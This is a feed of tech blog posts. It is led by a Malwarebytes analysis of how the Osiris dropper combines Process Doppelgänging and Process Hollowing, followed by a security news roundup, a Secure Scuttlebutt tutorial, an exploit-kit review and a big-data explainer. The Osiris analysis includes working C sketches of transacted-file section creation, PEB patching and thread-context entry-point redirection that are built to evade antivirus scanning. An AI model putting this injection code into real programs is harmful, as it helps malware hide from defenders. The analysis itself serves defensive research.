Classic Process Doppelgänging:

Process Hollowing:

Osiris Loader:

Creating a new process

The Osiris loader starts by creating the process into which it is going to inject. The process is created by a function from Kernel32: CreateProcessInternalW:

The new process (wermgr.exe) is created in a suspended state from the original file. So far, it reminds us of Process Hollowing, a much older technique of process impersonation.
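This first step can be reproduced with the documented API. The sketch below (our own simplified code, not the dropper’s) uses CreateProcessW with the CREATE_SUSPENDED flag; the Osiris loader reaches the same state through the internal kernel32!CreateProcessInternalW.

#include <windows.h>

// Start the benign host (wermgr.exe) suspended, the classic first step of
// Process Hollowing. Nothing in the new process runs until its thread is resumed.
BOOL create_suspended_host(PROCESS_INFORMATION *pi)
{
    STARTUPINFOW si = { sizeof(si) };
    WCHAR cmdline[] = L"C:\\Windows\\System32\\wermgr.exe";

    // CREATE_SUSPENDED: the primary thread exists but is never scheduled, so the
    // loader is free to rewrite the process image before anything executes.
    return CreateProcessW(NULL, cmdline, NULL, NULL, FALSE,
                          CREATE_SUSPENDED, NULL, NULL, &si, pi);
}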

In the Process Doppelgänging algorithm, the step of creating the new process is taken much later and uses a different, undocumented API: NtCreateProcessEx:

This difference is significant, because in Process Doppelgänging, the new process is created not from the original file, but from a special buffer (section). This section was supposed to be created earlier, using an “invisible” file created within the NTFS transaction. In the Osiris loader, this part also occurs, but the order is turned upside down, making us question if we can call it the same algorithm.

After the process is created, the same image (wermgr.exe) is mapped into the context of the loader, just like it was previously done with NTDLL.

As it later turns out, the loader will patch the remote process. The local copy of the wermgr.exe will be used to gather information about where the patches should be applied.

Usage of NTFS transactions

Let’s start with a brief look at what NTFS transactions are. Transactions are commonly used when operating on databases; a similar mechanism exists in the NTFS file system. NTFS transactions encapsulate a series of operations on files into a single unit. When a file is created inside a transaction, nothing from outside can access it until the transaction is committed. Process Doppelgänging uses them in order to create invisible files where the payload is dropped.

In the analyzed case, the usage of NTFS transactions is exactly the same. We can spot only small differences in the APIs used. The loader creates a new transaction, within which a new file is created. The original implementation used CreateTransaction and CreateFileTransacted from Kernel32. Here, they were substituted by low-level equivalents.

First, the function ZwCreateTransaction from NTDLL is called. Then, instead of CreateFileTransacted, the authors open the transacted file with RtlSetCurrentTransaction along with ZwCreateFile (the created file is %TEMP%\\Liebert.bmp). Then, the dropper writes a buffer into the file. Analogously, RtlSetCurrentTransaction with ZwWriteFile is used.

We can see that the buffer that is being written contains the new PE file: the second stage payload. Typically for this technique, the file is visible only within the transaction and cannot be opened by other processes, such as AV scanners.

This transacted file is then used to create a section. The function that can do it is available only via low-level API: ZwCreateSection/NtCreateSection.

After the section is created, that file is no longer needed. The transaction gets rolled back (by ZwRollbackTransaction), and the changes to the file are never saved on the disk.

So, the part described above is identical to the analogous part of Process Doppelgänging. The authors of the dropper made it even more stealthy by using low-level equivalents of the functions, called from a custom copy of NTDLL.
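For readers who want to see the transaction trick end to end, here is a rough sketch using the documented KTM functions that the original Process Doppelgänging write-up relied on (CreateTransaction, CreateFileTransactedW, RollbackTransaction). The Osiris dropper performs the same steps with the low-level equivalents named above (ZwCreateTransaction, RtlSetCurrentTransaction with ZwCreateFile/ZwWriteFile, ZwRollbackTransaction) called from its private NTDLL copy. The file path, function names, and error handling here are illustrative, not the dropper’s own.

#include <windows.h>
#include <winternl.h>
#include <ktmw32.h>                      // CreateTransaction, RollbackTransaction
#pragma comment(lib, "KtmW32.lib")

typedef NTSTATUS (NTAPI *NtCreateSection_t)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES,
                                            PLARGE_INTEGER, ULONG, ULONG, HANDLE);

// Turn an in-memory PE payload into an image section without ever leaving a
// visible file on disk.
HANDLE section_from_transacted_payload(const BYTE *payload, DWORD payloadSize)
{
    // 1. Open a transaction; files created inside it stay invisible to other
    //    processes (including AV scanners) until the transaction is committed.
    HANDLE hTransaction = CreateTransaction(NULL, NULL, 0, 0, 0, 0, NULL);
    if (hTransaction == INVALID_HANDLE_VALUE) return NULL;

    // 2. Create the transacted file (in the sample: %TEMP%\Liebert.bmp) and
    //    write the second-stage PE into it.
    HANDLE hFile = CreateFileTransactedW(L"C:\\Temp\\Liebert.bmp",
                                         GENERIC_READ | GENERIC_WRITE, 0, NULL,
                                         CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL,
                                         NULL, hTransaction, NULL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) { CloseHandle(hTransaction); return NULL; }

    DWORD written = 0;
    WriteFile(hFile, payload, payloadSize, &written, NULL);

    // 3. Turn the still-invisible file into an image section.
    NtCreateSection_t pNtCreateSection = (NtCreateSection_t)
        GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtCreateSection");
    HANDLE hSection = NULL;
    pNtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, NULL,
                     PAGE_READONLY, SEC_IMAGE, hFile);
    CloseHandle(hFile);

    // 4. Roll back the transaction: the file never becomes visible on disk,
    //    but the section (and the payload inside it) lives on.
    RollbackTransaction(hTransaction);
    CloseHandle(hTransaction);
    return hSection;
}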

From a section to a process

At this point, the Osiris dropper creates two completely unrelated elements:

  • A process (at this moment containing a mapped, legitimate executable wermgr.exe)
  • A section (created from the transacted file) and containing the malicious payload

If this were typical Process Doppelgänging, this situation would never occur; the process would be created directly from the section containing the mapped payload. So the question arises: how did the author of the dropper merge these elements together at this point?

If we trace the execution, we can see following function being called, just after the transaction is rolled back (format: RVA;function):

4b1e6;ntdll_1.ZwQuerySection
4b22b;ntdll.NtClose
4b239;ntdll.NtClose
4aab8;ntdll_1.ZwMapViewOfSection
4af27;ntdll_1.ZwProtectVirtualMemory
4af5b;ntdll_1.ZwWriteVirtualMemory
4af8a;ntdll_1.ZwProtectVirtualMemory
4b01c;ntdll_1.ZwWriteVirtualMemory
4b03a;ntdll_1.ZwResumeThread

So, it looks like the newly created section is just mapped into the new process as an additional module. After writing the payload into memory and setting the necessary patches, such as Entry Point redirection, the process is resumed:

The way in which the execution was redirected looks similar to variants of Process Hollowing. The PEB of the remote process is patched, and the new module base is set to the added section. (Thanks to this, imports will get loaded automatically when the process resumes.)
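A rough sketch of that PEB patch follows, under the assumption that the loader relies on the public PEB layout (the helper name and error handling are ours): query the remote PEB address with NtQueryInformationProcess, then overwrite its ImageBaseAddress field so that it points at the mapped payload section.

#include <windows.h>
#include <winternl.h>
#include <stddef.h>

typedef NTSTATUS (NTAPI *NtQueryInformationProcess_t)(HANDLE, PROCESSINFOCLASS,
                                                      PVOID, ULONG, PULONG);

// Point the remote process' PEB.ImageBaseAddress at the freshly mapped payload
// section, so imports are resolved against the payload when the process resumes.
BOOL repoint_image_base(HANDLE hProcess, PVOID newImageBase)
{
    NtQueryInformationProcess_t pNtQueryInformationProcess =
        (NtQueryInformationProcess_t)GetProcAddress(GetModuleHandleW(L"ntdll.dll"),
                                                    "NtQueryInformationProcess");
    PROCESS_BASIC_INFORMATION pbi = { 0 };
    ULONG len = 0;
    if (pNtQueryInformationProcess(hProcess, ProcessBasicInformation,
                                   &pbi, sizeof(pbi), &len) < 0)
        return FALSE;

    // In the public winternl.h layout, ImageBaseAddress is the second pointer of
    // the Reserved3 array, directly before Ldr. (A WoW64 process carries a second,
    // 32-bit PEB as well—one of the pain points discussed later.)
    LPBYTE imageBaseField = (LPBYTE)pbi.PebBaseAddress
                          + offsetof(PEB, Reserved3) + sizeof(PVOID);
    SIZE_T written = 0;
    return WriteProcessMemory(hProcess, imageBaseField, &newImageBase,
                              sizeof(newImageBase), &written)
           && written == sizeof(newImageBase);
}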

The Entry Point redirection is, however, done just by a patch at the Entry Point address of the original module. A single jump redirects to the Entry Point of the injected module:

In case patching the Entry Point has failed, the loader contains a second variant of Entry Point redirection, by setting the new address in the thread context (ZwGetThreadContext -> ZwSetThreadContext), which is a classic technique used in Process Hollowing:
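The fallback variant is the classic Process Hollowing redirection, which can be sketched with the documented thread-context API (the dropper uses the Zw* equivalents from its own NTDLL copy; the names below are ours). In a freshly created, still-suspended process, the primary thread’s context carries the entry point in RCX on x64 (EAX on x86), so overwriting that register is enough to hand control to the injected module.

#include <windows.h>

// Redirect the suspended primary thread to the payload's entry point, then resume.
// Same-bitness case shown; a WoW64 target driven from a 64-bit loader would need
// the Wow64GetThreadContext/Wow64SetThreadContext variants instead.
BOOL redirect_entry_point(HANDLE hThread, ULONG_PTR newEntryPoint)
{
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_INTEGER;        // we only need the integer registers

    if (!GetThreadContext(hThread, &ctx))      // ZwGetThreadContext in the dropper
        return FALSE;

#ifdef _WIN64
    ctx.Rcx = newEntryPoint;                   // entry point of the injected module
#else
    ctx.Eax = (DWORD)newEntryPoint;
#endif

    if (!SetThreadContext(hThread, &ctx))      // ZwSetThreadContext in the dropper
        return FALSE;

    return ResumeThread(hThread) != (DWORD)-1; // ZwResumeThread: let the payload run
}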

Best of both worlds

As we can see, the author merged some elements of Process Doppelgänging with some elements of Process Hollowing. This choice was not accidental. Both of those techniques have strong and weak points, but by merging them together, we get a power combo.

The weakest point of Process Hollowing is the memory type and protection set on the region where the payload is injected (more info here). Process Hollowing allocates memory pages in the remote process by VirtualAllocEx, then writes the payload there. This has one undesirable effect: the resulting memory type (MEM_PRIVATE) is different from that of a normally loaded executable (MEM_IMAGE).
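For comparison, this is roughly what the classic hollowing write looks like (illustrative code, not taken from any particular sample); a VirtualQueryEx on the resulting region reports MEM_PRIVATE, which is exactly the artifact memory scanners look for.

#include <windows.h>

// Classic Process Hollowing write: allocate private pages in the target and copy
// the payload in. The region's Type will be MEM_PRIVATE, not MEM_IMAGE.
PVOID hollow_write(HANDLE hProcess, const BYTE *payload, SIZE_T size, PVOID preferredBase)
{
    PVOID remote = VirtualAllocEx(hProcess, preferredBase, size,
                                  MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!remote) return NULL;

    SIZE_T written = 0;
    if (!WriteProcessMemory(hProcess, remote, payload, size, &written) || written != size)
        return NULL;
    return remote;
}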

Example of a payload loaded using Process Hollowing:

The major obstacle to loading the payload as an image is that, to do so, it first has to be dropped on the disk. Of course, we cannot do this, because once dropped, it would easily be picked up by an antivirus.

Process Doppelgänging on the other hand provides a solution: invisible transacted files, where the payload can be safely dropped without being noticed. This technique assumes that the transacted file will be used to create a section (MEM_IMAGE), and then this section will become a base of the new process (using NtCreateProcessEx).

Example of a payload loaded using Process Doppelgänging:

This solution works well, but it requires that all the process parameters also be set up manually: first creating them with RtlCreateProcessParametersEx and then writing them into the remote PEB. This made it difficult to run a 32-bit process on a 64-bit system, because in the case of WoW64 processes, there are two PEBs to be filled.

These problems of Process Doppelgänging can be solved easily if we create the process just like Process Hollowing does. Rather than using the low-level API, which is the only way to create a new process out of a section, the authors created the process from the legitimate file, using a documented API from Kernel32. The section carrying the payload, mapped with the proper type (MEM_IMAGE), can then be added later, and execution redirected to it.

Second stage loader

The next layer (8d58c731f61afe74e9f450cc1c7987be) is not the core yet, but the next stage of the loader. It imports only one DLL, Kernel32.

Its only role is to load the final payload. At this stage, we can hardly find something innovative. The Osiris core is unpacked piece by piece and manually loaded along with its dependencies into a newly-allocated memory area within the loader process.

After this self-injection, the loader jumps into the payload’s entry point:

The interesting thing is that the application’s entry point is different than the entry point saved in the header. So, if we dump the payload and try to run it independently, we will not get the same code executed. This is an interesting technique used to mislead researchers.

The entry point that was set in the headers is at RVA 0x26840:

The call leads to a function that makes the application go in an infinite sleep loop:

The real entry point, from which the execution of the malware should start, is at 0x25386, and it is known only to the loader.
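A short sketch of the difference, assuming the payload has already been mapped at some base address (the RVAs are the ones quoted above; the helper name is ours): the header’s AddressOfEntryPoint leads to the decoy sleep loop, while the loader calls a hard-coded RVA instead.

#include <windows.h>

typedef void (*entry_fn)(void);

// Decoy vs. real entry point of the dumped Osiris payload.
void run_real_entry(BYTE *mappedPayload)
{
    IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)mappedPayload;
    IMAGE_NT_HEADERS *nt  = (IMAGE_NT_HEADERS *)(mappedPayload + dos->e_lfanew);

    // What the OS loader (or a naive analyst) would execute: RVA 0x26840,
    // which just enters an infinite sleep loop.
    DWORD decoyEp = nt->OptionalHeader.AddressOfEntryPoint;
    (void)decoyEp;

    // What the second-stage loader actually calls: the hidden entry point.
    entry_fn realEntry = (entry_fn)(mappedPayload + 0x25386);
    realEntry();
}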

The second stage versus Kronos loader

A similar trick using a hidden entry point was used by the original Kronos (2a550956263a22991c34f076f3160b49). In Kronos’ case, the final payload is injected into svchost. The execution is redirected to the core by patching the entry point in svchost:

In this case, the entry point within the payload is at RVA 0x13B90, while the entry point saved in the payload’s header (d8425578fc2d84513f1f22d3d518e3c3) is at 0x15002.

The code at the real Kronos entry point displays similarities with the analogical point in Osiris. Yet, we can see they are not identical:

A precision implementation

The first stage loader is strongly inspired by Process Doppelgänging and is implemented in a clean and professional way. The author adopted elements from a relatively new technique and made the best out of it by composing it with other known tricks. The precision used here reminds us of the code used in the original Kronos. However, we can’t be sure if the first layer is written by the same author as the core bot. Malware distributors often use third-party crypters to pack their malware. The second stage is more tightly coupled with the payload, and here we can say with more confidence that this layer was prepared along with the core.

Malwarebytes can protect against this threat early on by breaking its distribution chain, which includes malicious documents sent in spam campaigns and drive-by downloads, thanks to our anti-exploit module. Additionally, our anti-malware engine detects both the dropper and the Osiris core.

Indicators of Compromise (IOCs)

Stage 1 (original sample)

e7d3181ef643d77bb33fe328d1ea58f512b4f27c8e6ed71935a2e7548f2facc0

Stage 2 (second stage loader)

40288538ec1b749734cb58f95649bd37509281270225a87597925f606c013f3a

Osiris (core bot)

d98a9c5b4b655c6d888ab4cf82db276d9132b09934a58491c642edf1662e831e

The post Process Doppelgänging meets Process Hollowing in Osiris dropper appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (August 6 – August 12)

Malwarebytes - Mon, 08/13/2018 - 16:37

Last week, we published a review of exploit kits, talked about everyday tech that can give you a headache, and showed how to protect RDP access from ransomware. We also published a study on the true cost of cybercrime.

Other news:

Stay safe, everyone!

The post A week in security (August 6 – August 12) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Dweb: Social Feeds with Secure Scuttlebutt

Mozilla Hacks - Wed, 08/08/2018 - 16:01

In the series introduction, we highlighted the importance of putting people in control of their social interactions online, instead of allowing for-profit companies to be the arbiters of hate speech or harassment. Our first installment in the Dweb series introduces Secure Scuttlebutt, which envisions a world where users are in full control of their communities online.

In the weeks ahead we will cover a variety of projects that represent explorations of the decentralized/distributed space. These projects aren’t affiliated with Mozilla, and some of them rewrite the rules of how we think about a web browser. What they have in common: they are open source, open for participation, and share Mozilla’s mission to keep the web open and accessible for all.

This post is written by André Staltz, who has written extensively on the fate of the web in the face of mass digital migration to corporate social networks, and is a core contributor to the Scuttlebutt project. –Dietrich Ayala

Getting started with Scuttlebutt

Scuttlebutt is a free and open source social network with unique offline-first and peer-to-peer properties. As a JavaScript open source programmer, I discovered Scuttlebutt two years ago as a promising foundation for a new “social web” that provides an alternative to proprietary platforms. The social metaphor of mainstream platforms is now a more popular way of creating and consuming content than the Web is. Instead of attempting to adapt existing Web technologies for the mobile social era, Scuttlebutt allows us to start from scratch the construction of a new ecosystem.

A local database, shared with friends

The central idea of the Secure Scuttlebutt (SSB) protocol is simple: your social account is just a cryptographic keypair (your identity) plus a log of messages (your feed) stored in a local database. So far, this has no relation to the Internet; it is just a local database where your posts are stored in an append-only sequence, which lets you write status updates like you would in a personal diary. SSB becomes a social network when those local feeds are shared among computers through the internet or through local networks. The protocol supports peer-to-peer replication of feeds, so that you can have local (and full) copies of your friends’ feeds, and update them whenever you are online. One implementation of SSB, Scuttlebot, uses Node.js and allows UI applications to interact with the local database and the network stack.
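
To make that concrete, here is a conceptual sketch using only Node’s built-in crypto module. It is not the real SSB message format (the protocol guide referenced at the end of this post describes that); it only illustrates the core idea that an identity is a keypair and a feed is a signed, append-only log:

// feed-sketch.js -- conceptual only: identity = keypair, feed = signed append-only log
// (This is NOT the real SSB message format; see the protocol guide for that.)
const crypto = require('crypto');

// Your identity is just a keypair.
const { publicKey, privateKey } = crypto.generateKeyPairSync('ed25519');

// Your feed is an append-only sequence of messages, each signed and chained to the previous one.
const feed = [];

function publish(content) {
  const previous = feed.length ? feed[feed.length - 1].signature : null;
  const body = JSON.stringify({ previous, sequence: feed.length + 1, content });
  const signature = crypto.sign(null, Buffer.from(body), privateKey).toString('base64');
  feed.push({ body, signature });
}

publish({ type: 'post', text: 'Hello world' });
publish({ type: 'post', text: 'Still offline, still posting' });

// Anyone holding the public key can verify the log has not been tampered with.
const valid = feed.every((msg) =>
  crypto.verify(null, Buffer.from(msg.body), publicKey, Buffer.from(msg.signature, 'base64'))
);
console.log('feed verifies:', valid);

Replication, in essence, is just copying someone else’s log and re-running the same verification against their public key.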

Using Scuttlebot

While SSB is being implemented in multiple languages (Go, Rust, C), its main implementation at the moment is the npm package scuttlebot and Electron desktop apps that use Scuttlebot. To build your own UI application from scratch, you can set up Scuttlebot plus a localhost HTTP server to render the UI in your browser.

Run the following npm command to add Scuttlebot to your Node.js project:

npm install --save scuttlebot

You can use Scuttlebot locally via the command-line interface to post messages, view messages, and connect with friends. First, start the server:

$(npm bin)/sbot server

In another terminal you can use the server to publish a message in your local feed:

$(npm bin)/sbot publish --type post --text "Hello world"

You can also consume invite codes to connect with friends and replicate their feeds. Invite codes are generated by pub servers owned by friends in the community, which act as mirrors of the community’s feeds. Using an invite code means the server will allow you to connect to it and will mirror your data too.

$(npm bin)/sbot invite.accept $INSERT_INVITE_CODE_HERE

To create a simple web app to render your local feed, you can start the scuttlebot server in a Node.js script (with dependencies ssb-config and pull-stream), and serve the feed through an HTTP server:

// server.js
const fs = require('fs');
const http = require('http');
const pull = require('pull-stream');
const sbot = require('scuttlebot/index').call(null, require('ssb-config'));

http
  .createServer((request, response) => {
    if (request.url.endsWith('/feed')) {
      pull(
        sbot.createFeedStream({live: false, limit: 100}),
        pull.collect((err, messages) => {
          response.end(JSON.stringify(messages));
        }),
      );
    } else {
      response.end(fs.readFileSync('./index.html'));
    }
  })
  .listen(9000);

Start the server with node server.js, and upon opening localhost:9000 in your browser, it should serve the index.html:

<html>
<body>
<script>
fetch('/feed')
  .then(res => res.json())
  .then(messages => {
    document.body.innerHTML = `
      <h1>Feed</h1>
      <ul>${messages
        .filter(msg => msg.value.content.type === 'post')
        .map(msg =>
          `<li>${msg.value.author} said: ${msg.value.content.text}</li>`
        )
      }</ul>
    `;
  });
</script>
</body>
</html>

Learn more

SSB applications can accomplish more than social messaging. Secure Scuttlebutt is being used for Git collaboration, chess games, and managing online gatherings.

You can build your own applications on top of SSB by creating or using plugins for specialized APIs or different ways of querying the database. See secret-stack for details on how to build custom plugins. See flumedb for details on how to create custom indexes in the database. There are also many useful repositories in our GitHub org.
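
As a rough sketch of what such a plugin looks like (the field names below are an approximation; defer to the secret-stack documentation for the authoritative shape), a plugin is an object with a name, a manifest describing its methods, and an init function that receives the running server:

// hello-plugin.js -- rough sketch of a plugin shape (field names approximate; see secret-stack docs)
module.exports = {
  name: 'hello',                 // the namespace the plugin's methods will live under
  version: '1.0.0',
  manifest: { shout: 'sync' },   // declares each method and how it is called (sync/async/source)
  init: (sbot, config) => ({
    // `sbot` exposes the other plugins already loaded on the stack
    shout: (name) => `hello, ${name}!`,
  }),
};

You would then compose it onto the stack with .use() when creating the server, as described in the secret-stack readme.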

To learn about the protocol that all of the implementations use, see the protocol guide, which explains the cryptographic primitives used and the data formats agreed on.

Finally, don’t miss the frontpage Scuttlebutt.nz, which explains the design decisions and principles we value. We highlight the important role that humans have in internet communities, which should not be delegated to computers.

The post Dweb: Social Feeds with Secure Scuttlebutt appeared first on Mozilla Hacks - the Web developer blog.

Categories: Techie Feeds

Exploit kits: summer 2018 review

Malwarebytes - Tue, 08/07/2018 - 15:00

The uptick trend in cybercriminals using exploit kits that we first noticed in our spring 2018 report has continued into the summer. Indeed, not only have new kits been found, but older ones are still showing signs of life. This has made the summer quarter one of the busiest we’ve seen for exploits in a while.

One caveat: apart from the RIG and GrandSoft exploit kits, the majority of EK activity we observe is concentrated in Asia, perhaps due to a greater likelihood of encountering vulnerable systems in that region. Malware distributors have complained that “loads” for the North American or European markets are too low via exploit kit, but other areas are still worthy targets.

In addition, we have witnessed many smaller and unsophisticated attackers using one or two exploits bluntly embedded in compromised websites. In this era of widely-shared exploit proof-of-concepts (PoCs), we are starting to see an increase in what we call “pseudo-exploit kits.” These are drive-by downloads that lack proper infrastructure and are typically the work of a lone author.

In this post, we will review the following exploit kits:
  • RIG EK
  • GrandSoft EK
  • Magnitude EK
  • GreenFlash Sundown EK
  • KaiXin EK
  • Underminer EK
  • Pseudo-EKs

CVEs

Two newly found vulnerabilities in 2018, Internet Explorer’s CVE-2018-8174 and Flash’s CVE-2018-4878, have been widely adopted and represent the only real attack surface at play. Nevertheless, some kits are still using older exploits in technologies that are being retired, and most likely with little efficacy.

RIG EK

RIG EK remains quite active in malvertising campaigns and compromised websites, and is one of the few exploit kits with a wider geographic presence. It is pictured below in what we call the HookAds campaign, delivering the AZORult stealer.

GrandSoft EK

GrandSoft is probably the second most active exploit kit with a backend infrastructure that is fairly static in comparison to RIG. Interestingly, both EKs can sometimes be seen sharing the same distribution campaigns, as pictured below:

Magnitude EK

Magnitude, the South Korean–focused EK, keeps delivering its own strain of ransomware (Magniber). We documented changes in Magniber in recent weeks with some code improvements, as well as a wider casting net among several Asian countries.

GreenFlash Sundown EK

A sophisticated but more elusive EK focusing on Flash’s CVE-2018-4878, GreenFlash Sundown is still active in parts of Asia thanks to a network of compromised OpenX ad servers. We haven’t seen any major changes since the last time we profiled it, and it is still distributing the Hermes ransomware.

KaiXin EK

KaiXin EK (also known as CK VIP) is an older exploit kit of Chinese origin, which has maintained its activity over the years. It is unique for the fact that it uses a combination of old (Java) and new vulnerabilities. When we captured it, we noted that it pushed the Gh0st RAT (Remote Access Trojan).

Underminer EK

Although this exploit kit was only identified and named recently, it has been around since at least November 2017 (perhaps with only limited distribution to the Chinese market). It is an interesting EK from a technical perspective with, for example, the use of encryption to package its exploit and prevent offline replays using traffic captures.

Another out-of-the-ordinary aspect of Underminer is its payload, which isn’t a packaged binary like others, but rather a set of libraries that install a bootkit on the compromised system. By altering the device’s Master Boot Record, this threat can launch a cryptominer every time the machine reboots.

Pseudo-EKs

Many exploit packs have leaked or been poached over the years, not to mention the availability of a large number of other dumps (e.g., HackingTeam) and proofs-of-concept. As a result, it is not surprising to see many less-skilled actors putting together their own “pseudo-exploit kits.” They are a far cry from a true EK—they are usually static in nature, their copy/paste exploits are buggy, and consequently, they are only used by the same threat actor in limited distribution. The pseudo-exploit we picture below (offensive domain name has been blurred) is one of the better ones we saw in July, in particular for its use of CVE-2018-8174.

Mitigation

We are continuously checking drive-by download attacks against our software. This time around, we had a more extensive test bed thanks to new and old exploit kits making it into this summer edition. Malwarebytes continues to block exploit kits with different layers of technology to protect our customers.

Don’t call it a comeback

It seems as though talking about the demise of exploit kits triggered an opposite reaction. Certainly, some digging is required to encounter the more obscure or geo-focused toolkits, but this revival of sorts continues thanks to Internet Explorer’s—and to a lesser extent Flash’s—newly found vulnerabilities.

While IE has a small and decreasing global market share (7 percent), it still has an important presence in countries like South Korea (31 percent) or Japan (18 percent), which could explain why there is still notable activity in a few select regions.

Exploit kits, even in a reduced and less impactful form, are likely to stick around for a while, at least for as long as people keep using a browser that refuses to go away.

The post Exploit kits: summer 2018 review appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 30 – August 5)

Malwarebytes - Mon, 08/06/2018 - 16:07

Last week, we posted a roundup of spam that may have landed in your mailbox, talked about what makes us susceptible to social engineering tactics, and took a deep dive into big data.

Other news:
  • Facebook claimed to have removed accounts that display behavior consistent with possible Russian actors engaged in misinformation. (Source: The Wall Street Journal)
  • Yale University disclosed that they were breached at least a decade ago. (Source: NBC – Connecticut)
  • High school students, be on the lookout! If you receive email or snail mail from organizations with impressive-sounding names, consider that it may just be a carefully packaged marketing scheme. (Source: Sophos’s Naked Security Blog)
  • A researcher from Amnesty International revealed that hackers have targeted them with malware from an Israeli vendor. (Source: Motherboard)
  • Certain e-commerce providers in the UK were affected by a data breach that potentially exposed more than a million user records. (Source: Graham Cluley’s blog)
  • A game on the Steam platform was found hijacking video game player machines to mine cryptocurrency. (Source: Motherboard)
  • The Alaskan Borough of Matanuska-Susitna was infected with malware that disrupted normal activities so much that they had to dust off old typewriters to continue issuing receipts. (Source: Sophos’s Naked Security blog)
  • While we’re on the subject of breaches, here’s another popular victim: Reddit. (Source: TechCrunch)
  • Google joined Apple in banning mining apps on the Play Store. (Source: Coin Central)
  • An independent security researcher from the UK spotted a DHL-themed spam carrying malware hidden in a GIF file. (Source: The SANS ISC InfoSec Forums)

Stay safe, everyone!

The post A week in security (July 30 – August 5) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: What is big data?

Malwarebytes - Fri, 08/03/2018 - 15:00

If the pile of manure is big enough, you will find a gold coin in it eventually. This saying is used often to explain why anyone would use big data. Needless to say, in this day and age, the piles of data are so big, you might end up finding a pirate’s treasure.

How big is the pile?

But when is the pile big enough to consider it big data? Per Wikipedia:

“Big data is data sets that are so big and complex that traditional data-processing application software are inadequate to deal with them.”

As a consequence, we can say that it’s not just the size that matters, but the complexity of a dataset. The draw of big data to researchers and scientists, however, is not in its size or complexity, but in how it may be computationally analyzed to reveal patterns, trends, and associations.

When it comes to big data, no mountain is high enough or too difficult to climb. The more data we have to analyze, the more relevant conclusions we may be able to derive. If a dataset is large enough, we can start making predictions about how certain relationships will develop in the future and even find relationships we never suspected to exist.

The treasure

We mentioned predicting the future or finding advantageous correlations as possible reasons for using big data analysis. Just to name a few examples, big data could be used to set up profiles and processes for the following:

  • Stop terrorist attacks by creating profiles of likely attackers and their methods.
  • More accurately target customers for marketing initiatives using individual personas.
  • Calculate insurance rates by building risk profiles.
  • Optimize website user experiences by creating and monitoring visitor behavior profiles.
  • Analyze workflow charts and processes to improve business efficiency.
  • Improve city planning by analyzing and understanding traffic patterns.

Beware of apophenia

Apophenia is the tendency to perceive connections and meaning between unrelated things. What statistical analysis might show to be a correlation between two facts or data streams could simply be a coincidence. There could be a third factor at play that was missed, or the data set might be skewed. This can lead to false conclusions and to actions being undertaken for the wrong reasons.

For example, analysis of data collected about medical patients could lead to the conclusion that those with arthritis also tend to have high blood pressure, when in reality, the most popular medication used to treat arthritis lists high blood pressure as a side effect. Remember the old research edict: correlation does not equal causation.

In statistics, we call this a type I error, and it’s the feeding ground for many myths, superstitions, and fallacies.
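
As a toy illustration (not from the original article), consider two made-up series that merely trend upward over the same years; a quick Pearson correlation calculation makes them look tightly linked even though neither causes the other:

// correlation-sketch.js -- toy example: two unrelated, upward-trending series correlate strongly
function pearson(xs, ys) {
  const n = xs.length;
  const mean = (a) => a.reduce((sum, v) => sum + v, 0) / n;
  const mx = mean(xs);
  const my = mean(ys);
  let num = 0;
  let dx = 0;
  let dy = 0;
  for (let i = 0; i < n; i++) {
    num += (xs[i] - mx) * (ys[i] - my);
    dx += (xs[i] - mx) ** 2;
    dy += (ys[i] - my) ** 2;
  }
  return num / Math.sqrt(dx * dy);
}

// Hypothetical yearly figures: ice cream sales vs. sunglasses sales. Both simply grow over time.
const iceCream = [10, 12, 15, 18, 22, 27];
const sunglasses = [5, 7, 8, 11, 13, 16];
console.log(pearson(iceCream, sunglasses).toFixed(2)); // ~0.99, yet neither causes the other

A high correlation value on its own tells you nothing about mechanism, which is exactly the trap apophenia sets.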

The researchers

As more and more data becomes digitized and stored, the need for big data analysts grows. A recent study showed that 53 percent of the companies interviewed were using big data in one way or another. Some examples of use cases for big data include:

  • Data warehouse optimization (considered the top use case for big data)
  • Analyzing patterns in employee satisfaction; for example, in multinational companies, a 0.1 percent increase in turnover is considered too high
  • Sports statistics and analysis; sometimes the difference between being the champion or coming in second comes down to the tiniest detail
  • Prognosis statistics or success rates of particular medications can influence a doctor’s recommended course of treatment; an accurate assessment of which could be the difference between life and death
  • Selecting stocks for purchase and trade; quick decision-making based on analytical algorithms gives traders the edge

At Malwarebytes, we use big data in the form of anonymous telemetry gathered from our users (those that allow it) to monitor active threats. Viewing these data sets allows us to see trends in malware development, from the types of malware that are being used in the wild to the geographic locations of attacks.

From these data, we’re able to draw conclusions and share valuable information on the blog, in reports, such as our quarterly Cybercrime Tactics and Techniques report, and even in heat maps like the one we created for WannaCry. (As our product detected WannaCry even before we added definitions, this gave us some valuable information about where it might have originated.)

The tools

Technologically, the tools you will need to analyze big data depend on a few variables:

  • How is the data organized?
  • How big is big?
  • How complex is the data?

When we are looking at the organization of data, we are not just focusing on the structure and uniformity of the data, but the location of the data as well. Are they spread over several servers, completely or partially in the cloud, or are they all in one place?

Obviously, uniformity makes data easier to compare and manipulate, but we don’t always have that luxury. And it takes powerful and smart statistical tools to make sense out of polymorphous or differently-structured datasets.

As we have seen before, the complexity of the data can be another reason why we need special big data tools, even if the sheer volume is not that large.

While big data tools are becoming more widely available, many are still in the early stages of development, and not all of them are ready for intuitive use. It takes knowledge and familiarity to use them most effectively. That is where personal preference comes in. Using a tool you have experience with is always easier, at least at first.

Our personal data

When we go online, we leave a trail of data behind that can be used by marketers (and criminals) to profile us and our environment. This makes us predictable to a certain extent. Marketers love this type of predictability, as it enables them to figure out what they can sell us, how much of it, and at which price. If you’ve ever wondered how you saw an ad for vintage sunglasses on Facebook when you were only searching on Google, the answer is big data.

Imagine a virtual assistant that retrieves travel arrangement information at your first whim of considering a vacation. Hotels, flights, activities, food and drink—all could be listed to your liking, in your favorite locations, and in your price range at the blink of an eye. Some may find this scary, others would consider it convenient. However you feel, the virtual assistant is able to do this because of the big data it collects on you and your behavior online.

The data-driven society

